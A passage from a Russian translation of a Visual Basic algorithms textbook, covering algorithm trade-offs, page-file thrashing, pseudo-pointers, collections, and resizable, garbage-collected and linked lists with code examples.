Тем не менее, если взять конкретные функции оценки времени выполнения для каждого из двух алгоритмов, например, для первого f(N)=30*N+7000, а для второго f(N)=N2, то в этом случае при N меньше 100 второй алгоритм будет выполняться быстрее. Поэтому, если известно, что размерность данных задачи не будет превышать 100, возможно будет целесообразнее применить второй алгоритм.
С другой стороны, время выполнения разных инструкций может сильно отличаться. Если первый алгоритм использует быстрые операции с памятью, а второй использует медленное обращение к диску, то первый алгоритм будет быстрее во всех случаях.
==================11
Другие факторы могут также осложнить проблему выбора оптимального алгоритма. Например, первый алгоритм может требовать большего объема памяти, чем установлено на компьютере. Реализация второго алгоритма, в свою очередь, может потребовать намного больше времени, если этот алгоритм намного сложнее, а его отладка может превратиться в настоящий кошмар. Иногда подобные практические соображения могут сделать теоретический анализ сложности алгоритма почти бессмысленным.
Тем не менее, анализ сложности алгоритма полезен для понимания особенностей алгоритма и обычно обнаруживает части программы, занимающие большую часть компьютерного времени. Уделив внимание оптимизации кода в этих частях, можно внести максимальный эффект в увеличение производительности программы в целом.
Иногда тестирование алгоритмов является наиболее подходящим способом определить наилучший алгоритм. При таком тестировании важно, чтобы тестовые данные были максимально приближены к реальным данным. Если тестовые данные сильно отличаются от реальных, результаты тестирования могут сильно отличаться от реальных.
Обращение к файлу подкачки
Важным фактором при работе в реальных условиях является частота обращения к файлу подкачки (page file). Операционная система Windows отводит часть дискового пространства под виртуальную память (virtual memory). Когда исчерпывается оперативная память, Windows сбрасывает часть ее содержимого на диск. Освободившаяся память предоставляется программе. Этот процесс называется подкачкой, поскольку страницы, сброшенные на диск, могут быть подгружены системой обратно в память при обращении к ним.
Поскольку операции с диском намного медленнее операций с памятью, слишком частое обращение к файлу подкачки может значительно снизить производительность приложения. Если программа часто обращается к большим объемам памяти, система будет часто использовать файл подкачки, что приведет к замедлению работы.
Приведенная в числе примеров программа Pager запрашивает все больше и больше памяти под создаваемые массивы до тех пор, пока программа не начнет обращаться к файлу подкачки. Введите количество памяти в мегабайтах, которое программа должна запросить, и нажмите кнопку Page (Подкачка). Если ввести небольшое значение, например 1 или 2 Мбайт, программа создаст массив в оперативной памяти, и будет выполняться быстро.
Если же вы введете значение, близкое к объему оперативной памяти вашего компьютера, то программа начнет использовать файл подкачки. Вполне вероятно, что она будет при этом обращаться к диску постоянно. Вы также заметите, что программа выполняется намного медленнее. Увеличение размера массива на 10 процентов может привести к 100процентному увеличению времени исполнения.
Программа Pager может использовать память одним из двух способов. Если вы нажмете кнопку Page, программа начнет последовательно обращаться к элементам массива. По мере перехода от одной части массива к другой, системе может потребоваться подгружать их с диска. После того, как часть массива оказалась в памяти, программа может продолжить работу с ней.
============12
Если же вы нажмете на кнопку Thrash (Пробуксовка), программа будет случайно обращаться к разным участкам памяти. При этом вероятность того, что нужная страница находится в этот момент на диске, намного возрастает. Это избыточное обращение к файлу подкачки называется пробуксовкойпамяти (thrashing). В табл. 1.4 приведено время исполнения программы Pager на компьютере с процессором Pentium с тактовой частотой 90 МГц и 24 Мбайт оперативной памяти. В зависимости от конфигурации вашего компьютера, скорости работы с диском, количества установленной оперативной памяти, а также наличия других запущенных параллельно приложений время выполнения программы может сильно различаться.
Вначале время выполнения теста растет почти пропорционально размеру занятой памяти. Когда начинается обращение к файлу подкачки, скорость работы программы резко падает. Заметьте, что до этого тесты с обращением к файлу подкачки и пробуксовкой ведут себя практически одинаково, то есть когда весь массив находится в оперативной памяти, последовательное и случайное обращение к элементам массива занимает одинаковое время. При подкачке элементов массива с диска случайный доступ к памяти намного менее эффективен.
Для уменьшения числа обращений к файлу подкачки есть несколько способов. Основной прием — экономное расходование памяти. При этом надо помнить, что программа обычно не может занять всю физическую память, потому что часть ее занимает система и другие программы. Компьютер, на котором были получены результаты, приведенные в табл. 1.4, начинал интенсивно обращаться к диску, когда программа занимала 20 Мбайт из 24 Мбайт физической памяти.
Иногда можно написать код так, что программа будет обращаться к блокам памяти последовательно. Алгоритм сортировки слиянием, описанный в 9 главе, манипулирует большими блоками данных. Эти блоки сортируются, а затем сливаются вместе. Упорядоченная работа с памятью уменьшает число обращений к диску.
@Таблица 1.4. Время выполнения программы Pager в секундах
===============13
Алгоритм пирамидальной сортировки, также описанный в 9 главе, произвольно переходит от одной части списка к другой. Для очень больших списков это может приводить к перегрузке памяти. С другой стороны, сортировка слиянием требует большего объема памяти, чем пирамидальная сортировка. Если список достаточно большой, это также может приводить к обращению к файлу подкачки.
Псевдоуказатели, ссылки на объекты и коллекции
В некоторых языках, например в C, C++ или Delphi, можно определять переменные, которые являются указателями (pointers) на участки памяти. В этих участках могут содержаться массивы, строки, или другие структуры данных. Часто указатель ссылается на структуру, которая содержит другой указатель и так далее. Используя структуры, содержащие указатели, можно организовывать всевозможные списки, графы, сети и деревья. В последующих главах рассматриваются некоторые из этих сложных структур.
До третьей версии Visual Basic не содержал средств для прямого создания ссылок. Тем не менее, поскольку указатель всего лишь ссылается на какойлибо участок данных, то можно, создав массив, использовать целочисленный индекс массива в качестве указателя на его элементы. Это называется псевдоуказателем (fake pointer).
Ссылки
В 4-й версии Visual Basic были впервые введены классы. Переменная, указывающая на экземпляр класса, является ссылкой на объект. Например, в следующем фрагменте кода переменная obj — это ссылка на объект класса MyClass. Эта переменная не указывает ни на какой объект, пока она не определяется при помощи зарезервированного слова New. Во второй строке оператор New создает новый объект и записывает ссылку на него в переменную obj.
Dim obj As MyClass
Set obj = New MyClass
Ссылки в Visual Basic — это разновидность указателей.
Объекты в Visual Basic используют счетчик ссылок (reference counter) для упрощения работы с объектами. Когда создается новая ссылка на объект, счетчик ссылок увеличивается на единицу. После того, как ссылка перестает указывать на объект, счетчик ссылок соответственно уменьшается. Когда счетчик ссылок становится равным нулю, объект становится недоступным программе. В этот момент Visual Basic уничтожает объект и возвращает занятую им память.
В следующих главах более подробно обсуждаются ссылки и счетчики ссылок.
Коллекции
Кроме объектов и ссылок, в 4-й версии Visual Basic также появились коллекции. Коллекцию можно представить как разновидность массива. Они
================14
предоставляют в распоряжение программиста удобные возможности, например можно менять размер коллекции, а также осуществлять поиск объекта по ключу.
Вопросы производительности
Псевдоуказатели, ссылки и коллекции упоминаются в этой главе потому, что они могут сильно влиять на производительность программы. Ссылки и коллекции могут упрощать программирование определенных операций, но они могут потребовать дополнительных расходов памяти.
Программа Faker на диске с примерами демонстрирует взаимосвязь между псевдоуказателями, ссылками и коллекциями. Когда вы вводите число и нажимаете кнопку Create List (Создать список), программа создает список элементов одним из трех способов. Вначале она создает объекты, соответствующие отдельным элементам, и добавляет ссылки на объекты к коллекции. Затем она использует ссылки внутри самих объектов для создания связанного списка объектов. И, наконец, она создает связный список при помощи псевдоуказателей. Пока не будем останавливаться на том, как работают связные списки. Они будут подробно разбираться во 2 главе.
После нажатия на кнопку Search List (Поиск в списке), программа Faker выполняет поиск по всем элементам списка, а после нажатия на кнопку Destroy List (Уничтожить список) уничтожает все списки и освобождает память.
В табл. 1.5 приведены значения времени, которое требуется программе для выполнения этих задач на компьютере с процессором Pentium с тактовой частотой 90 МГц. Из таблицы видно, что за удобство работы с коллекциями приходится платить ценой большего времени, затрачиваемого на создание и уничтожение коллекций.
Коллекции также содержат индекс списка. Часть времени, затрачиваемого при создании коллекции, и уходит на создание индекса. При уничтожении коллекции сохраняемые в ней ссылки освобождаются. При этом система проверяет и обновляет счетчики ссылок для всех объектов. Если они равны нулю, то сам объект также уничтожается. Все это занимает дополнительное время.
При использовании псевдоуказателей создание и уничтожение списка происходит так быстро, что этим временем можно практически пренебречь. Системе при этом не надо заботиться о ссылках, счетчиках ссылок и об освобождении объектов.
С другой стороны, поиск в коллекции осуществляется гораздо быстрее, чем в двух остальных случаях, поскольку коллекция использует быстрое хеширование (hashing) построенного индекса, в то время как список ссылок и список псевдоуказателей используют медленный последовательный поиск. В 11 главе объясняется, как можно добавить хеширование к своей программе без использования коллекций.
@Таблица 1.5. Время Создания/Поиска/Уничтожения списков в секундах
==============15
Хотя применение псевдоуказателей обычно обеспечивает лучшую производительность, оно менее удобно, чем использование ссылок. Если в программе нужен лишь небольшой список, ссылки и коллекции могут работать достаточно быстро. При работе с большими списками можно получить более высокую производительность, используя псевдоуказатели.
Резюме
Анализ производительности алгоритмов позволяет сравнить разные алгоритмы. Он также помогает оценить поведение алгоритмов при различных условиях. Выделяя только части алгоритма, которые вносят наибольший вклад во время исполнения программы, анализ помогает определить, доработка каких участков кода позволяет внести максимальный вклад в улучшение производительности.
В программировании часто приходится идти на различные компромиссы, которые могут сказываться на производительности. Один алгоритм может быть быстрее, но за счет использования большого объема памяти. Другой алгоритм, использующий коллекции, может быть более медленным, но зато его проще разрабатывать и поддерживать.
После анализа доступных алгоритмов, понимания того, как они ведут себя в различных условиях и их требований к ресурсам, вы можете выбрать оптимальный алгоритм для вашей задачи.
==============16
Глава 2. Списки
Существует четыре основных способа распределения памяти в Visual Basic: объявление переменных стандартных типов (целые, с плавающей точкой и т.д.); объявление переменных типов, определенных пользователем; создание экземпляров классов при помощи оператора New и изменение размера массивов. Существует еще несколько способов, например, создание нового экземпляра формы или элемента управления, но эти способы не дают больших возможностей при создании сложных структур данных.
Используя эти методы, можно легко строить статические структуры данных, такие как большие массивы определенных пользователем типов. Вы также можете изменять размер массива при помощи оператора ReDim. Тем не менее, перераспределение данных может быть достаточно сложным. Например, для того, чтобы переместить элемент с одного конца массива на другой, потребуется переупорядочить весь массив, сдвинув все элементы на одну позицию, чтобы заполнить освободившееся пространство. Затем можно поместить элемент на его новое место.
Динамические структуры данных позволяют быстро и легко выполнять такого рода изменения. Всего за несколько шагов можно переместить любой элемент в структуре данных в любое другое положение.
В этой главе описаны методы создания динамических списков в Visual Basic. Различные типы списков обладают разными свойствами. Некоторые из них просты и обладают ограниченной функциональностью, другие же, такие как циклические списки, одно или двусвязные списки, являются более сложными и поддерживают более развитые средства управления данными.
В последующих главах описанные методы используются для построения стеков, очередей, массивов, деревьев, хэштаблиц и сетей. Вам необходимо усвоить материал этой главы перед тем, как продолжить чтение.
Знакомство со списками
Простейшая форма списка — это группа объектов. Она включает в себя объекты и позволяет программе обращаться к ним. Если это все, что вам нужно от списка, вы можете использовать массив в качестве списка, отслеживая при помощи переменной NumInList число элементов в списке. Определив при помощи этой переменной число имеющихся элементов, программа затем может по очереди обратиться к ним в цикле For и выполнить необходимые действия.
=============17
Если вы в своей программе можете обойтись этим подходом, используйте его. Этот метод эффективен, и его легко отлаживать и поддерживать благодаря его простоте. Тем не менее, большинство программ не столь просты, и в них требуются более сложные конструкции даже для таких простых объектов, как списки. Поэтому в последующих разделах этой главы обсуждаются некоторые пути создания списков с большей функциональностью.
В первом параграфе описываются пути создания списков, которые могут расти и уменьшаться со временем. В некоторых программах нельзя заранее определить, насколько большой список понадобится. Вы можете справиться с такой ситуацией при помощи списка, который может при необходимости изменять свой размер.
В следующем параграфе обсуждаются неупорядоченные списки (unordered list), которые позволяют удалять элементы из любой части списка. Неупорядоченные списки дают больший контроль над содержимым списка, чем простые списки. Они также являются более динамичными, так как позволяют изменять содержимое в произвольный момент времени.
В последующих разделах обсуждаются связные списки (linked list), которые используют указатели для создания чрезвычайно гибких структур данных. Вы можете добавлять или удалять элементы из любой части связного списка с минимальными усилиями. В этих параграфах также описаны некоторые разновидности связных списков, такие как циклические, двухсвязные списки или списки со ссылками.
Простые списки
Если в вашей программе необходим список постоянного размера, вы можете создать его, просто используя массив. В этом случае можно при необходимости опрашивать его элементы в цикле For.
Многие программы используют списки, которые растут или уменьшаются со временем. Можно создать массив, соответствующий максимально возможному размеру списка, но такое решение не всегда будет оптимальным. Не всегда можно заранее знать, насколько большим может стать список, кроме того, вероятность, что список станет очень большим, может быть невелика, и созданный массив гигантских размеров может большую часть времени лишь понапрасну занимать память.
Коллекции
Программа может использовать коллекции Visual Basic для хранения списка переменного размера. Метод Add Item добавляет элемент в коллекцию. Метод Remove удаляет элемент. Следующий фрагмент кода демонстрирует программу, которая добавляет три элемента к коллекции и затем удаляет второй элемент.
Dim list As New Collection
Dim obj As MyClass
Dim I As Integer
‘ Создать и добавить 1 элемент.
Set obj = New MyClass
list.Add obj
‘ Добавить целое число.
i = 13
list.Add I
‘ Добавить строку.
list.Add "Работа с коллекциями"
‘ Удалить 2 элемент (целое число).
list.Remove 2
===============18
Коллекции пытаются обеспечить поддержку любых приложений, и выполняют замечательную работу. Их легко использовать, они позволяют извлекать элементы, проиндексированные по ключу, и дают приемлемую производительность, если не содержат слишком много элементов.
Тем не менее, коллекциям свойственны и определенные недостатки. Для больших списков, коллекции могут работать медленнее, чем массивы. Если в вашей программе не нужны все свойства, предоставляемые коллекцией, более быстрым может быть использование простого массива.
Схема хэширования, которую коллекции используют для управления ключами, также накладывает ряд ограничений. Во-первых, коллекции не позволяют дублировать ключи. Во-вторых, для коллекции можно определить, какой элемент имеет заданный ключ, но нельзя узнать, какой ключ соответствует данному элементу. И, наконец, коллекции не поддерживают множественных ключей. Например, может быть, вам хотелось бы, чтобы программа могла производить поиск по списку служащих, используя имя сотрудника или его идентификационный номер в системе социального страхования. Коллекция не сможет поддерживать оба метода поиска, так как она способна оперировать только одним ключом.
В последующих параграфах описываются методы построения списков, свободных от этих ограничений.
Список переменного размера
Оператор Visual Basic ReDim позволяет изменять размер массива. Вы можете использовать это свойство для построения простого списка переменного размера. Начните с объявления безразмерного массива для хранения элементов списка. Также определите переменную NumInList для отслеживания числа элементов в списке. При добавлении элементов к списку используйте оператор ReDim для увеличения размера массива, чтобы новый элемент мог поместиться в нем. При удалении элемента также используйте оператор ReDim для уменьшения массива и освобождения ненужной больше памяти.
Dim List() As String ‘ Список элементов.
Dim NumInList As Integer ‘ Число элементов в списке.
Sub AddToList(value As String)
‘ Увеличить размер массива.
NumInList = NumInList + 1
ReDim Preserve List (1 To NumInList)
‘ Добавить новый элемент к концу списка.
List(NumInList) = value
End Sub
Sub RemoveFromList()
‘ Уменьшить размер массива, освобождая память.
NumInList = NumInList – 1
ReDim Preserve List (1 To NumInList)
End Sub
==================19
Эта простая схема неплохо работает для небольших списков, но у нее есть пара недостатков. Во-первых, приходится часто менять размер массива. Для создания списка из 1000 элементов, придется 1000 раз изменять размер массива. Хуже того, при увеличении размера списка, на изменение его размера потребуется больше времени, поскольку придется каждый раз копировать растущий список в памяти.
Для уменьшения частоты изменений размера массива, можно добавлять дополнительные элементы к массиву при увеличении его размера, например, по 10 элементов вместо одного. При этом, когда вы будете добавлять новые элементы к списку в будущем, массив уже будет содержать неиспользуемые ячейки, в которые вы сможете поместить новые элементы без увеличения размера массива. Новое увеличение размера массива потребуется, только когда пустые ячейки закончатся.
Подобным же образом можно избежать изменения размера массива при каждом удалении элемента из списка. Можно подождать, пока в массиве не накопится 20 неиспользуемых ячеек, прежде чем уменьшать его размер. При этом нужно оставить 10 свободных ячеек для того, чтобы можно было добавлять новые элементы без необходимости снова увеличивать размер массива.
Заметим, что максимальное число неиспользуемых ячеек (20) должно быть больше, чем минимальное число (10). Это уменьшает число изменений размера массива при удалении или добавлении его элементов.
При такой схеме в списке обычно есть несколько свободных ячеек, тем не менее их число достаточно мало, и лишние затраты памяти невелики. Свободные ячейки гарантируют возможность добавления или удаления элементов без изменения размера массива. Фактически, если вы неоднократно добавляете к списку, а затем удаляете из него один или два элемента, вам может никогда не понадобиться изменять размер массива.
Dim List() As String ‘ Список элементов.
Dim ArraySize As Integer ‘ Размер массива.
Dim NumInList As Integer ‘ Число используемых элементов.
‘ Если массив заполнен, увеличить его размер, добавив 10 ячеек.
‘ Затем добавить новый элемент в конец списка.
Sub AddToList(value As String)
NumInList = NumInList + 1
If NumInList > ArraySize Then
ArraySize = ArraySize + 10
ReDim Preserve List(1 To ArraySize)
End If
List(NumInList) = value
End Sub
‘ Удалить последний элемент из списка. Если осталось больше
‘ 20 пустых ячеек, уменьшить список, освобождая память.
Sub RemoveFromList()
NumInList = NumInList – 1
If ArraySize – NumInList > 20 Then
ArraySize = ArraySize –10
ReDim Preserve List(1 To ArraySize)
End If
End Sub
=============20
Для очень больших массивов это решение может также оказаться не самым лучшим. Если вам нужен список, содержащий 1000 элементов, к которому обычно добавляется по 100 элементов, то все еще слишком много времени будет тратиться на изменение размера массива. Очевидной стратегией в этом случае было бы увеличение приращения размера массива с 10 до 100 или более ячеек. Тогда можно было бы добавлять по 100 элементов одновременно без частого изменения размера списка.
Более гибким решением будет изменение приращения в зависимости от размера массива. Для небольших списков это приращение было бы также небольшим. Хотя изменения размера массива происходили бы чаще, они потребовали бы относительно немного времени для небольших массивов. Для больших списков, приращение размера будет больше, поэтому их размер будет изменяться реже.
Следующая программа пытается поддерживать примерно 10 процентов списка свободным. Когда массив заполняется, его размер увеличивается на 10 процентов. Если свободное пространство составляет более 20 процентов от размера массива, программа уменьшает его.
При увеличении размера массива, добавляется не меньше 10 элементов, даже если 10 процентов от размера массива составляют меньшую величину. Это уменьшает число необходимых изменений размера массива, если список очень мал.
Const WANT_FREE_PERCENT = .1 ‘ 10% свободного места.
Const MIN_FREE = 10 ‘ Минимальное число пустых ячеек.
Global List() As String ‘ Массив элементов списка.
Global ArraySize As Integer ‘ Размер массива.
Global NumItems As Integer ‘ Число элементов в списке.
Global ShrinkWhen As Integer ‘ Уменьшить размер, если NumItems < ShrinkWhen.
‘ Если массив заполнен, увеличить его размер.
‘ Затем добавить новый элемент в конец списка.
Sub Add(value As String)
NumItems = NumItems + 1
If NumItems > ArraySize Then ResizeList
List(NumItems) = value
End Sub
‘ Удалить последний элемент из списка.
‘ Если в массиве много пустых ячеек, уменьшить его размер.
Sub RemoveLast()
NumItems = NumItems – 1
If NumItems < ShrinkWhen Then ResizeList
End Sub
‘ Увеличить размер массива, чтобы 10% ячеек были свободны.
Sub ResizeList()
Dim want_free As Integer
want_free = WANT_FREE_PERCENT * NumItems
If want_free < MIN_FREE Then want_free = MIN_FREE
ArraySize = NumItems + want_free
ReDim Preserve List(1 To ArraySize)
‘ Уменьшить размер массива, если NumItems < ShrinkWhen.
ShrinkWhen = NumItems – want_free
End Sub
===============21
Класс SimpleList
Чтобы использовать этот простой подход, программе необходимо знать все параметры списка, при этом нужно следить за размером массива, числом используемых элементов, и т.д. Если необходимо создать больше одного списка, потребуется множество копий переменных и код, управляющий разными списками, будет дублироваться.
Классы Visual Basic могут сильно облегчить выполнение этой задачи. Класс SimpleList инкапсулирует эту структуру списка, упрощая управление списками. В этом классе присутствуют методы Add и Remove для использования в основной программе. В нем также есть процедуры извлечения свойств NumItems и ArraySize, с помощью которых программа может определить число элементов в списке и объем занимаемой им памяти.
Процедура ResizeList объявлена как частная внутри класса SimpleList. Это скрывает изменение размера списка от основной программы, поскольку этот код должен использоваться только внутри класса.
Используя класс SimpleList, легко создать в приложении несколько списков. Для того чтобы создать новый объект для каждого списка, просто используется оператор New. Каждый из объектов имеет свои переменные, поэтому каждый из них может управлять отдельным списком:
Dim List1 As New SimpleList
Dim List2 As New SimpleList
Когда объект SimpleList увеличивает массив, он выводит окно сообщения, показывающее размер массива, количество неиспользуемых элементов в нем, и значение переменной ShrinkWhen. Когда число использованных ячеек в массиве становится меньше, чем значение ShrinkWhen, программа уменьшает размер массива. Заметим, что когда массив практически пуст, переменная ShrinkWhen иногда становится равной нулю или отрицательной. В этом случае размер массива не будет уменьшаться, даже если вы удалите все элементы из списка.
=============22
Программа SimList добавляет к массиву еще 50 процентов пустых ячеек, если необходимо увеличить его размер, и всегда оставляет при этом не менее 1 пустой ячейки. Эти значения был выбраны для удобства работы с программой. В реальном приложении, процент свободной памяти должен быть меньше, а число свободных ячеек больше. Более разумным в таком случае было бы выбрать значения порядка 10 процентов от текущего размера списка и минимум 10 свободных ячеек.
Неупорядоченные списки
В некоторых приложениях может понадобиться удалять элементы из середины списка, добавляя при этом элементы в конец списка. В этом случае порядок расположения элементов может быть не важен, но при этом может быть необходимо удалять определенные элементы из списка. Списки такого типа называются неупорядоченными списками (unordered lists). Они также иногда называются «множеством элементов».
Неупорядоченный список должен поддерживать следующие операции:
добавление элемента к списку;
удаление элемента из списка;
определение наличия элемента в списке;
выполнение какихлибо операций (например, вывода на дисплей или принтер) для всех элементов списка.
Простую структуру, представленную в предыдущем параграфе, можно легко изменить для того, чтобы обрабатывать такие списки. Когда удаляется элемент из середины списка, остальные элементы сдвигаются на одну позицию, заполняя образовавшийся промежуток. Это показано на рис. 2.1, на котором второй элемент удаляется из списка, и третий, четвертый, и пятый элементы сдвигаются влево, заполняя свободный участок.
Удаление из массива элемента при таком подходе может занять достаточно много времени, особенно если удаляется элемент в начале списка. Чтобы удалить первый элемент из массива с 1000 элементов, потребуется сдвинуть влево на одну позицию 999 элементов. Гораздо быстрее удалять элементы можно при помощи простой схемы чистки памяти (garbage collection).
Вместо удаления элементов из списка, пометьте их как неиспользуемые. Если элементы списка — данные простых типов, например целые, можно помечать элементы, используя определенное, так называемое «мусорное» значение (garbage value).
@Рисунок 2.1 Удаление элемента из середины массива
===========23
Для целых чисел можно использовать для этого значение 32.767. Для переменной типа Variant можно использовать значение NULL. Это значение присваивается каждому неиспользуемому элементу. Следующий фрагмент кода демонстрирует удаление элемента из подобного целочисленного списка:
Const GARBAGE_VALUE = -32767
‘ Пометить элемент как неиспользуемый.
Sub RemoveFromList(position As Long)
List(position) = GARBAGE_VALUE
End Sub
Если элементы списка — это структуры, определенные оператором Type, вы можете добавить к такой структуре новое поле IsGarbage. Когда элемент удаляется из списка, значение поля IsGarbage устанавливается в True.
Type MyData
Name As Sring ‘ Данные.
IsGarbage As Integer ‘ Этот элемент не используется?
End Type
‘ Пометить элемент, как не использующийся.
Sub RemoveFromList (position As Long)
List(position).IsGarbage = True
End Sub
Для простоты далее в этом разделе предполагается, что элементы данных являются данными универсального типа и их можно помечать значением NULL.
Теперь можно изменить другие процедуры, которые используют список, чтобы они пропускали помеченные элементы. Например, так можно модифицировать процедуру, которая печатает список:
‘ Печать элементов списка.
Sub PrintItems()
Dim I As Long
For I = 1 To ArraySize
If Not IsNull(List(I)) Then ‘ Если элемент не помечен
Print Str$(List(I)) ‘ напечатать его.
End If
Next I
End Sub
После использования в течение некоторого времени схемы пометки «мусора», список может оказаться полностью им заполнен. В конце концов, подпрограммы вроде этой процедуры больше времени будут тратить на пропуск ненужных элементов, чем на обработку настоящих данных.
=============24
Для того, чтобы избежать этого, можно периодически запускать процедуру очистки памяти (garbage collection routine). Эта процедура перемещает все непомеченные записи в начало массива. После этого можно добавить их к свободным элементам в конце массива. Когда потребуется добавить к массиву дополнительные элементы, их также можно будет использовать без изменения размера массива.
После добавления помеченных элементов к другим свободным ячейкам массива, полный объем свободного пространства может стать достаточно большим, и в этом случае можно уменьшить размер массива, освобождая память:
Private Sub CollectGarbage()
Dim i As Long
Dim good As Long
good = 1 ‘ Первый используемый элемент.
For i = 1 To m_NumItems
‘ Если он не помечен, переместить его на новое место.
If Not IsNull(m_List(i)) Then
m_List(good) = m_list(i)
good = good + 1
End If
Next i
‘ Последний используемый элемент.
m_NumItems(good) = good - 1
‘ Необходимо ли уменьшать размер списка?
If m_NumItems < m_ShrinkWhen Then ResizeList
End Sub
При выполнении чистки памяти, используемые элементы перемещаются ближе к началу списка, заполняя пространство, которое занимали помеченные элементы. Значит, положение элементов в списке может измениться во время этой операции. Если другие часть программы обращаются к элементам списка по их положению в нем, необходимо модифицировать процедуру чистки памяти, с тем, чтобы она также обновляла ссылки на положение элементов в списке. В общем случае это может оказаться достаточно сложным, приводя к проблемам при сопровождении программ.
Можно выбирать разные моменты для запуска процедуры чистки памяти. Один из них — когда массив достигает определенного размера, например, когда список содержит 30000 элементов.
Этому методу присущи определенные недостатки. Вопервых, он использует большой объем памяти. Если вы часто добавляете или удаляете элементы, «мусор» будет занимать довольно большую часть массива. При таком неэкономном расходовании памяти, программа может тратить время на свопинг, хотя список мог бы целиком помещаться в памяти при более частом переупорядочивании.
===========25
Во-вторых, если список начинает заполняться ненужными данными, процедуры, которые его используют, могут стать чрезвычайно неэффективными. Если в массиве из 30.000 элементов 25.000 не используются, подпрограмма типа описанной выше PrintItems, может выполняться ужасно медленно.
И, наконец, чистка памяти для очень большого массива может потребовать значительного времени, в особенности, если при обходе элементов массива программе приходится обращаться к страницам, выгруженным на диск. Это может приводить к «подвисанию» вашей программы на несколько секунд во время чистки памяти.
Чтобы решить эту проблему, можно создать новую переменную GarbageCount, в которой будет находиться число ненужных элементов в списке. Когда значительная часть памяти, занимаемой списком, содержит ненужные элементы, вы может начать процедуру «сборки мусора».
Dim GarbageCount As Long ‘ Число ненужных элементов.
Dim MaxGarbage As Long ‘ Это значение определяется в ResizeList.
‘ Пометить элемент как ненужный.
‘ Если «мусора» слишком много, начать чистку памяти.
Public Sub Remove(position As Long)
m_List(position) = Null
m_GarbageCount = m_GarbageCount + 1
‘ Если «мусора» слишком много, начать чистку памяти.
If m_GarbageCount > m_MaxGarbage Then CollectGarbage
End Sub
Программа Garbage демонстрирует этот метод чистки памяти. Она пишет рядом с неиспользуемыми элементами списка слово «unused», а рядом с помеченными как ненужные — слово «garbage». Программа использует класс GarbageList примерно так же, как программа SimList использовала класс SimpleList, но при этом она еще осуществляет «сборку мусора».
Чтобы добавить элемент к списку, введите его значение и нажмите на кнопку Add (Добавить). Для удаления элемента выделите его, а затем нажмите на кнопку Remove (Удалить). Если список содержит слишком много «мусора», программа начнет выполнять чистку памяти.
При каждом изменении размера списка объекта GarbageList, программа выводит окно сообщения, в котором приводится число используемых и свободных элементов в списке, а также значения переменных MaxGarbage и ShrinkWhen. Если удалить достаточное количество элементов, так что больше, чем MaxGarbage элементов будут помечены как ненужные, программа начнет выполнять чистку памяти. После ее окончания, программа уменьшает размер массива, если он содержит меньше, чем ShrinkWhen занятых элементов.
Если размер массива должен быть увеличен, программа Garbage добавляет к массиву еще 50 процентов пустых ячеек, и всегда оставляет хотя бы одну пустую ячейку при любом изменении размера массива. Эти значения были выбраны для упрощения работы пользователя со списком. В реальной программе процент свободной памяти должен быть меньше, а число свободных ячеек — больше. Оптимальными выглядят значения порядка 10 процентов и 10 свободных ячеек.
==========26
Связные списки
Другая стратегия используется при управлении связанными списками. Связанный список хранит элементы в структурах данных или объектах, которые называются ячейками (cells). Каждая ячейка содержит указатель на следующую ячейку в списке. Так как единственный тип указателей, которые поддерживает Visual Basic — это ссылки на объекты, то ячейки в связном списке должны быть объектами.
В классе, задающем ячейку, должна быть определена переменная NextCell, которая указывает на следующую ячейку в списке. В нем также должны быть определены переменные, содержащие данные, с которыми будет работать программа. Эти переменные могут быть объявлены как открытые (public) внутри класса, или класс может содержать процедуры для чтения и записи значений этих переменных. Например, в связном списке с записями о сотрудниках, в этих полях могут находиться имя сотрудника, номер социального страхования, название должности, и т.д. Определения для класса EmpCell могут выглядеть примерно так:
Public EmpName As String
Public SSN As String
Public JobTitle As String
Public NextCell As EmpCell
Программа создает новые ячейки при помощи оператора New, задает их значения и соединяет их, используя переменную NextCell.
Программа всегда должна сохранять ссылку на вершину списка. Для того, чтобы определить, где заканчивается список, программа должна установить значение NextCell для последнего элемента списка равным Nothing (ничего). Например, следующий фрагмент кода создает список, представляющий трех сотрудников:
Dim top_cell As EmpCell
Dim cell1 As EmpCell
Dim cell2 As EmpCell
Dim cell3 As EmpCell
‘ Создание ячеек.
Set cell1 = New EmpCell
cell1.EmpName = "Стивенс”
cell1.SSN = "123-45-6789"
cell1.JobTitle = "Автор"
Set cell2 = New EmpCell
cell2.EmpName = "Кэтс”
cell2.SSN = "123-45-6789"
cell2.JobTitle = "Юрист"
Set cell3 = New EmpCell
cell3.EmpName = "Туле”
cell3.SSN = "123-45-6789"
cell3.JobTitle = "Менеджер"
‘ Соединить ячейки, образуя связный список.
Set cell1.NextCell = cell2
Set cell2.NextCell = cell3
Set cell3.NextCell = Nothing
‘ Сохранить ссылку на вершину списка.
Set top_cell = cell1
===============27
На рис. 2.2 показано схематическое представление этого связного списка. Прямоугольники представляют ячейки, а стрелки — ссылки на объекты. Маленький перечеркнутый прямоугольник представляет значение Nothing, которое обозначает конец списка. Имейте в виду, что top_cell, cell1 и cell2 – это не настоящие объекты, а только ссылки, которые указывают на них.
Следующий код использует связный список, построенный при помощи предыдущего примера для печати имен сотрудников из списка. Переменная ptr используется в качестве указателя на элементы списка. Она первоначально указывает на вершину списка. В коде используется цикл Do для перемещения ptr по списку до тех пор, пока указатель не дойдет до конца списка. Во время каждого цикла, процедура печатает поле EmpName ячейки, на которую указывает ptr. Затем она увеличивает ptr, указывая на следующую ячейку в списке. В конце концов, ptr достигает конца списка и получает значение Nothing, и цикл Do останавливается.
Dim ptr As EmpCell
Set ptr = top_cell ‘ Начать с вершины списка.
Do While Not (ptr Is Nothing)
‘ Вывести поле EmpName этой ячейки.
Debug.Print ptr.Empname
‘ Перейти к следующей ячейке в списке.
Set ptr = ptr.NextCell
Loop
После выполнения кода вы получите следующий результат:
Стивенс
Кэтс
Туле
@Рис. 2.2. Связный список
=======28
Использование указателя на другой объект называется косвенной адресацией (indirection), поскольку вы используете указатель для косвенного манипулирования данными. Косвенная адресация может быть очень запутанной. Даже для простого расположения элементов, такого, как связный список, иногда трудно запомнить, на какой объект указывает каждая ссылка. В более сложных структурах данных, указатель может ссылаться на объект, содержащий другой указатель. Если есть несколько указателей и несколько уровней косвенной адресации, вы легко можете запутаться в них
Для того, чтобы облегчить понимание, в изложении используются иллюстрации, такие как рис. 2.2,(для сетевой версии исключены, т.к. они многократно увеличивают размер загружаемого файла) чтобы помочь вам наглядно представить ситуацию там, где это возможно. Многие из алгоритмов, которые используют указатели, можно легко проиллюстрировать подобными рисунками.
Добавление элементов к связному списку
